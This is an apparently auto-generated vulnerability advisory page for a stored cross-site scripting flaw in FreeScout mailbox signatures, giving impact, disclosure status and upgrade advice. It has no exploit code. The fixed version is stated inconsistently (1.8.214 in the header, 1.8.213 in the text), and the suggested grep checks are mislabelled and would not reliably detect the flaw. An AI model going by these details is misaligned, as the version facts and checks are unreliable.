Plattform
php
Komponente
freescout-help-desk
Behoben in
1.8.214
CVE-2026-40568 describes a stored cross-site scripting (XSS) vulnerability discovered in FreeScout, a free self-hosted help desk and shared mailbox application. This vulnerability allows attackers to inject malicious scripts into mailbox signatures, potentially leading to account compromise and data theft. The issue affects versions 1.0.0 through 1.8.212, and a patch is available in version 1.8.213.
The XSS vulnerability in FreeScout allows an attacker to inject arbitrary JavaScript code into the mailbox signature displayed to other users. This can be exploited to steal user session cookies, redirect users to malicious websites, or deface the FreeScout interface. Successful exploitation could lead to account takeover, data theft, and further compromise of the system. The lack of robust sanitization of HTML tags and event handlers within the Helper::stripDangerousTags() function is the root cause, enabling the injection of elements like <img>, <svg>, and <details> with malicious event attributes.
CVE-2026-40568 was publicly disclosed on 2026-04-21. Currently, there are no known public exploits or active campaigns targeting this vulnerability. The vulnerability is not listed on the CISA KEV catalog. While a proof-of-concept is likely possible given the nature of the XSS vulnerability, no public POCs have been reported as of the disclosure date.
Organizations utilizing FreeScout for help desk and shared mailbox management are at risk. This includes businesses of all sizes, particularly those relying on self-hosted deployments. Shared hosting environments where multiple FreeScout instances reside on a single server are especially vulnerable, as a compromise of one instance could potentially impact others.
• wordpress / composer / npm:
grep -r '<script>' /var/www/freescout/app/Http/Controllers/MailboxesController.php
grep -r 'event handler' /var/www/freescout/app/Misc/Helper.php• generic web:
curl -I http://your-freescout-instance/mailboxes/signatures/new | grep -i content-security-policydisclosure
Exploit-Status
EPSS
0.03% (10% Perzentil)
CISA SSVC
CVSS-Vektor
The primary mitigation for CVE-2026-40568 is to immediately upgrade FreeScout to version 1.8.213 or later. If upgrading is not immediately feasible, consider implementing a Web Application Firewall (WAF) rule to block requests containing suspicious HTML tags or event handlers in the mailbox signature field. Additionally, review and sanitize all user-supplied input within the application, paying close attention to HTML encoding and escaping. Monitor FreeScout logs for unusual activity or attempts to inject malicious code.
Aktualisieren Sie FreeScout auf Version 1.8.213 oder höher, um die XSS-Schwachstelle zu beheben. Diese Version behebt die HTML-Bereinigung in Mailbox-Signaturen, indem gefährliche Event-Handler-Attribute entfernt und sichergestellt wird, dass nur sichere HTML-Tags zulässig sind.
Schwachstellenanalysen und kritische Warnungen direkt in deinen Posteingang.
CVE-2026-40568 is a stored cross-site scripting (XSS) vulnerability in FreeScout versions 1.0.0 through 1.8.212, allowing attackers to inject malicious scripts via mailbox signatures.
You are affected if you are running FreeScout versions 1.0.0 through 1.8.212. Verify your version and upgrade immediately if vulnerable.
Upgrade FreeScout to version 1.8.213 or later to resolve the vulnerability. Consider WAF rules as a temporary mitigation.
As of the current disclosure date, there are no confirmed reports of active exploitation, but the vulnerability's ease of exploitation warrants caution.
Refer to the FreeScout security advisory on their official website or GitHub repository for detailed information and updates.
Lade deine Abhängigkeitsdatei hoch und erfahre sofort, ob dich diese und andere CVEs treffen.